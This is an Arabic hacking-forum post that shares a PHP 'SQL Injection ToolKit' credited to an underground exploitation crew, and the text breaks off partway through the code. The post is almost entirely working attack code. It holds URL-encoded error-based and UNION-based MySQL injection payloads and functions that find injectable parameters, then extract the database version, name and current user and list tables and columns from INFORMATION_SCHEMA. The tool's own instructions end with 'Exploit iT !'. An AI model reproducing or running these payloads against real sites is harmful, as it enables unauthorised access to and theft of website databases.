1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Dr.Attack | المشاهدات : 2,299 | الردود : 9
الوسوم:
حالة الموضوع:
مغلق
  1. Dr.Attack Developer

    الأنتساب:
    ‏3 أغسطس 2012
    المشاركات:
    72
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    30
    الإقامة:
    هنآآآآآ
    [​IMG]

    آخواني الكرام اليوم جبت معي سكريبت PHP SQL Injection sCanner بسيط و معروف يقوم بفحص المواقع من ثغرات الاسكيل انجكتر لاحظت انه مبرمج من قبل الهكر الجزائري كيد انس عموما مفيد و يمكن اعتباره بديل للبرامج التقليدية فهو يعلمك الاعتماد على نفسك بعض الشيء




    صوره توضيحيه "


    [​IMG]


    [​IMG]


    [​IMG]


    كود:
    <?php
    echo "<title>Dis9-SQL  Injection  ToolKit v0.1</title>";
    /*****************************************************************
    
    
    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
    3                                                                      3
    3     ________   .__          ________                                 3
    7     \______ \  |__|  ______/   __   \     ____    ____    _____      7
    1      |    |  \ |  | /  ___/\____    /   _/ ___\  /  _ \  /     \     1
    3      |    `   \|  | \___ \    /    /    \  \___ (  <_> )|  Y Y  \    3
    3     /_______  /|__|/____  >  /____/   /\ \___  > \____/ |__|_|  /    3
    7             \/          \/            \/     \/               \/     7
    1                                                                      1
    3              >> The Underground Exploitation Team <<                 3
    3-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=3
    
    
    [+] Author : KedAns-Dz < ked-h [ at ] hotmail.com | 1337day.com | dis9.com >
    [+] Home : [ www.1337day.com]  * [ www.dis9.com ]
    [+] Facebook : [ http://facebook.com/KedAns ]
    [+] Cr3w : [ Dis9 Underground Exploitation Team ]
    [+] Greets to : Dz Offenders Cr3W <*> Algerian Cyber Army <*> Inj3ct0r Team
    
    
    ******************************************************************/
    
    
    $a = array(
    '%27%20AND%20%28SELECT%208041%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20%28CASE%20WHEN%20%288041%3D8041%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR',
    '%27%29%20AND%20%28SELECT%208041%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20%28CASE%20WHEN%20%288041%3D8041%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM',
    '%20AND%20%28SELECT%208041%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20%28CASE%20WHEN%20%288041%3D8041%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
    '%29%20AND%20%28SELECT%208041%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20%28CASE%20WHEN%20%288041%3D8041%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609'
    );
    $b = array(
    //UNION queries:
    '%20-6863%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20CONCAT%280x3a6f79753a%2C0x4244764877697569706b%2C0x3a70687a3a%29%2C%20NULL%2C%20NULL%2C%20NULL%23', //10 cols
    '%20-6863%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20CONCAT%280x3a6f79753a%2C0x4244764877697569706b%2C0x3a70687a3a%29%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23', //8 cols
    '%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20CONCAT%280x3a6f79753a%2C0x4244764877697569706b%2C0x3a70687a3a%29%2C%20NULL%23', //8cols v2
    '%20-6863%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%280x3a6f79753a%2C0x4244764877697569706b%2C0x3a70687a3a%29%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23',//6 cols
    );
    
    
    
    
    
    
    //globals
    $string= 'You have an error in your SQL syntax';
    $string2= 'supplied argument is not a valid MySQL';
    $string3= ':oyu:';
    $string4= 'dummy request';
    @$url2 = "$url\")'";
    $html = @file_get_contents("$url2");
    $pos = strpos($html, $string);
        
    
    
    //--------------------------------------------------------------------------------------------------------------
    
    
    
    
        foreach ($_GET as $key => $val) $$key=htmldecode($val);
        foreach ($_POST as $key => $val) $$key=htmldecode($val);
        foreach ($_COOKIE as $key => $val) $$key=htmldecode($val);
    
    
       
        
    switch (@$frame){
            case 1: frame1(); break;
            case 2: frame2(); break;
            case 3: frame3(); break;
            case 4: frame4(); break;
            case 5: frame5(); break;
            default:
                switch(@$action){
                    default: frameset();
      
                }
            }
    
    
    function htmldecode($str){
        if (is_string($str)){
           if (get_magic_quotes_gpc()) return stripslashes(html_entity_decode($str));
           else return html_entity_decode($str);
        } else return $str;
    }
    function html_header($plus=""){
    
    
    echo "
    <html>
    <head>
    <meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">
    
    
    $plus
     <style>
        body {
            font-family : Arial;
    
    
            font-weight : normal;
            color: green;
            background-color: black;
        }
        </style>
    </head>
    
    
    ";
    }
    
    
    //------------------------------------------------------------------------------------------------------------------
    
    
    //Functions for queries and stuffs
    
    
    if(@$mode_eb == 1){
    @$version = "$url+%27%20AND%20%28SELECT%206722%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
    @$database = "$url+%27%20AND%20%28SELECT%206870%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
    @$usuario = "$url+%27%20AND%20%28SELECT%202525%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
    
    
    
    
    }elseif(@$mode_eb == 2){
    @$version = "$url+%27%29%20AND%20%28SELECT%206722%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
    @$database = "$url+%27%29%20AND%20%28SELECT%206870%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
    @$usuario = "$url+%27%29%20AND%20%28SELECT%202525%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
    
    
    
    
    }elseif(@$mode_eb == 3){
    @$version = "$url+%20AND%20%28SELECT%206722%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
    @$database = "$url+%20AND%20%28SELECT%206870%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
    @$usuario = "$url+%20AND%20%28SELECT%202525%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
    
    
    
    
    }elseif(@$mode_eb == 4){
    @$version = "$url+%29%20AND%20%28SELECT%206722%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
    @$database = "$url+%29%20AND%20%28SELECT%206870%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
    @$usuario = "$url+%29%20AND%20%28SELECT%202525%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
    
    
    
    
    
    
    }
    
    
        @$versio = @file_get_contents("$version");
        @$databas = @file_get_contents("$database");
        @$usuari = @file_get_contents("$usuario");
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    function hexEncode($str){
        if(is_null($str)){
        return FALSE;
       }
        $hexStr = "";
         for($i=0;isset($str[$i]);$i++){
           $char = dechex(ord($str[$i]));
           $hexStr .= $char;
         }
          return "0x".$hexStr;
         }
    function asciiEncode($str){
          if(!preg_match("/^0x[A-Fa-f0-9]+/",$str)){
           return FALSE;   //Not a hex string
          }
           $str = substr($str,2);
         $asciiString = "";
          for($i=0;isset($str[$i]);$i+=2){
           $hexChar = substr($str,$i,2);
            $asciiString .= chr(hexdec($hexChar));
          }
       return $asciiString;
      }
    function GetBetween($content){
        $r = explode(":oyu:", $content);
        if (isset($r[1])){
            $r = explode(":phz:", $r[1]);
            return $r[0];
      }
      return '';
    }
    
    
    function mode_comaprison_eb($detectar_t){
    
    
    if($detectar_t == @$detectar)
    {return "vulnerable";}
    }
    function mode_comaprison_uq($detectar_t){
    //UNION query:
    if($detectar_t == @$detectar2)
    {return "vulnerable";}//10 cols
    }
    
    
    
    
    
    
    function frameset(){
        
        html_header();
            
        echo "
        <frameset rows=\"*,25%\" framespacing=\"0\" frameborder=\"0\">
                <frame src=\"".$_SERVER['PHP_SELF']."?frame=1\" name=frame1 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
            <frameset cols=\"33%,*,33%\" framespacing=\"0\" frameborder=\"0\">
                <frame src=\"".$_SERVER['PHP_SELF']."?frame=2\" name=frame2 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
            <frame src=\"".$_SERVER['PHP_SELF']."?frame=3\" name=frame3 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
                <frame src=\"".$_SERVER['PHP_SELF']."?frame=4\" name=frame4 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
            </frameset>
            <!--    <frame src=\"".$_SERVER['PHP_SELF']."?frame=5\" name=frame5 border=\"0\" marginwidth=\"0\" marginheight=\"0\">!-->
           </frameset>
        ";
        echo "</html>";
    }
    function frame1(){
                global $string2, $string, $string3, $pos, $url2, $html, $mode_eb, $a, $b;
                 global $action, $detectar_t;
        html_header();
         echo "<body>\n";
    
    
        
    
    
    echo " 
    <center>
    <table border=0 width=700 align=center><tr><Td><center><p style='font-size: 18pt;'>
    <b>Dis9-SQL Inj3ction ToolKit v0.1 | KedAns-Dz</br></b></td></tr>
    </center>
    
    
    </table>
    [!] Usage: <br>
    [+] Paste URL (example: http://site.com/test.php?id=1)<br>
    [+] Press \"seach\" button.<br>
    [+] Exploit iT !<br><br>
    <table>
    <tr><td>
    
    
    <center>
    <form action=\" ".$_SERVER['PHP_SELF']."?frame=1\" method=\"post\" name=\"forma\" id=\"forma\">
    url: <input type=\"text\" name=\"url\" id=\"url\" size=\"65\"/>
    <input type=\"submit\" name=\"forma\" id=\"form\" value=\"search\"/>
    </form>
    </center>
    ";
    
    
    if(isset($_POST['forma']) && $_POST['forma']=='search')
    {
    
    
        $url = $_POST["url"];
        echo "Testing: $url<br><br>";
    
    
            $a;
            foreach($a as $detectar){
    
    
            $url3 = "$url+$detectar";
            @$html2 = file_get_contents("$url3");
    
    
            if(strpos($html2, @$string3)==true)
            {
                if(mode_comaprison_eb($detectar) == "vulnerable"){
    
    
                }
            $mode_eb = $as;
            
            echo "<font color=blue>Detected: ERROR BASED inyection =)</font> <br>QUERY: <font size=2 color=red>$detectar</font><br><br>";
            @$eb_i = 1;
            
            }
            $as++;
            
            }
            if (@$eb_i ==1){
                    echo "
                    <center>
        <form action=\"".$_SERVER['PHP_SELF']."?frame=2\" method=\"post\" target=\"frame2\" name=\"tablas\" id=\"tablas\">
        <input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
        <input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_eb\"/>
        <input type=\"submit\" name=\"tablas\" id=\"tablas\" value=\"GET Exploit\"/>
        
        </form> 
        </center>
        ";}
    
    
            foreach($b as $detectar2){
            $url6 = "$url+$detectar2";
            @$html8 = file_get_contents("$url6");    
            
            if(strpos(@$html8, @$string3)==true){
                if(mode_comaprison_uq($detectar2) == "vulnerable"){
                    }
                
            echo "<center><font color=blue>Detected: UNION query inyection =)</font> <br>QUERY: <font size=2 color=red>$detectar2</font><br><br></center>";
            $uq_i = 1;
            }        
            
            }
            if((@$eb_i == 0) && (@$uq_i==0))
            {
            echo "<center><br><font color=red>No  Injection  point founded =(</font><br><br></center>";
            }
    
    
    
    
    }
         echo "</body>\n</html>";    
    
    
    }
    function frame2(){
        html_header();
    global $string2, $string, $string3, $pos, $url2, $html;
    global $action, $detectar_t;
    
    
    if(isset($_POST['tablas']) && $_POST['tablas']=='GET Exploit')
    {
        
    
    
        $url = $_POST["url"];
        $mode_eb = $_POST["lol"];
        
    if ($mode_eb==1){ 
        @$tablas2 = "$url+%27%20AND%20%28SELECT%203830%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
        }
    elseif ($mode_eb==2){ 
        @$tablas2 = "$url+%27%29%20AND%20%28SELECT%203830%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
        }
    elseif ($mode_eb==3){ 
        @$tablas2 = "$url+%20AND%20%28SELECT%203830%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
        }
    elseif ($mode_eb==4){ 
        @$tablas2 = "$url+%29%20AND%20%28SELECT%203830%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
        }
    $tabla = @file_get_contents("$tablas2");    
    
    
    
    
        $i = -1;   
          
         
    echo "
        <form action=\"".$_SERVER['PHP_SELF']."?frame=3\" target=\"frame3\" method=\"post\" name=\"columnas\" id=\"columnas\">
        <input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
        <select name=\"num\" id=\"num\>";
        while ($i <= (GetBetween($tabla)-1)):
        
            if($mode_eb == 1){
            @$_tablas = "%27%20AND%20%28SELECT%207288%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
    }elseif($mode_eb == 2){
            @$_tablas = "%27%29%20AND%20%28SELECT%207288%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
    }elseif($mode_eb == 3){
            @$_tablas = "%20AND%20%28SELECT%207288%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
    }elseif($mode_eb == 4){
            @$_tablas = "%29%20AND%20%28SELECT%207288%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
    }
        $nums_tablas = "$url+$_tablas";
        
        echo $nums_tablas;
        $n_tabla = file_get_contents("$nums_tablas");
        
        $num = GetBetween($n_tabla);
        echo "<option value=\"".hexEncode($num)."\">$num</option>";
        $i++;
        endwhile;
    
    
        echo "</select>";
        echo"<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_eb\"/>";
        echo "    <input type=\"submit\" name=\"columnas\" id=\"columnas\" value=\"columns\"/>";
        echo "<form>";
    
    
    }
    //STILL PLAYING WITH UNION QUERIES
    
    
    
    
        }
    function frame3(){
    html_header();
    global $string2, $string, $string3, $pos, $url2, $html;
    global $action, $detectar_t;
    
    
    
    
    if(isset($_POST['columnas']) && $_POST['columnas']=='columns')
    {
        $url = $_POST["url"];
        $table_n = $_POST["num"];
        $mode_eb = $_POST["lol"];
        
            if($mode_eb == 1){
    @$columna = "$url+%27%20AND%20%28SELECT%201906%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";        
    }elseif($mode_eb == 2){
    @$columna = "$url+%27%29%20AND%20%28SELECT%201906%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
    }elseif($mode_eb == 3){
    @$columna = "$url+%20AND%20%28SELECT%201906%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
    }elseif($mode_eb == 4){
            @$columna = "$url+%29%20AND%20%28SELECT%201906%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
    }
        
    
    
    
    
    
    
        
        @$column = @file_get_contents("$columna");
        
        
        
    
    
    echo "
        <form action=\"".$_SERVER['PHP_SELF']."?frame=4\" target=\"frame4\" method=\"post\" name=\"datas\" id=\"datas\">
        <input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
        <input type=\"hidden\" name=\"dz\" id=\"dz\" value=\"".asciiEncode($table_n)."\"/>";
        $i = 0;
        
        echo"<select name=\"num2\" id=\"num2\">";
        while ($i <= GetBetween($column)-1):
            if($mode_eb == 1){
                @$_column = "%27%20AND%20%28SELECT%205724%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28column_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
        }elseif($mode_eb == 2){
                @$_column = "%27%29%20AND%20%28SELECT%205724%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28column_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
        }elseif($mode_eb == 3){
                @$_column = "%20AND%20%28SELECT%205724%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28column_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
        }elseif($mode_eb == 4){
                @$_column = "%29%20AND%20%28SELECT%205724%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28column_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
        }
        
        
        
        
        
        $nums_columna = "$url+$_column";
        $n_tcolum = file_get_contents("$nums_columna");
        $num2 = GetBetween($n_tcolum);
        echo "<option value=\"$num2\">$num2</option>";
        $i++;
        endwhile;
        echo "</select>";
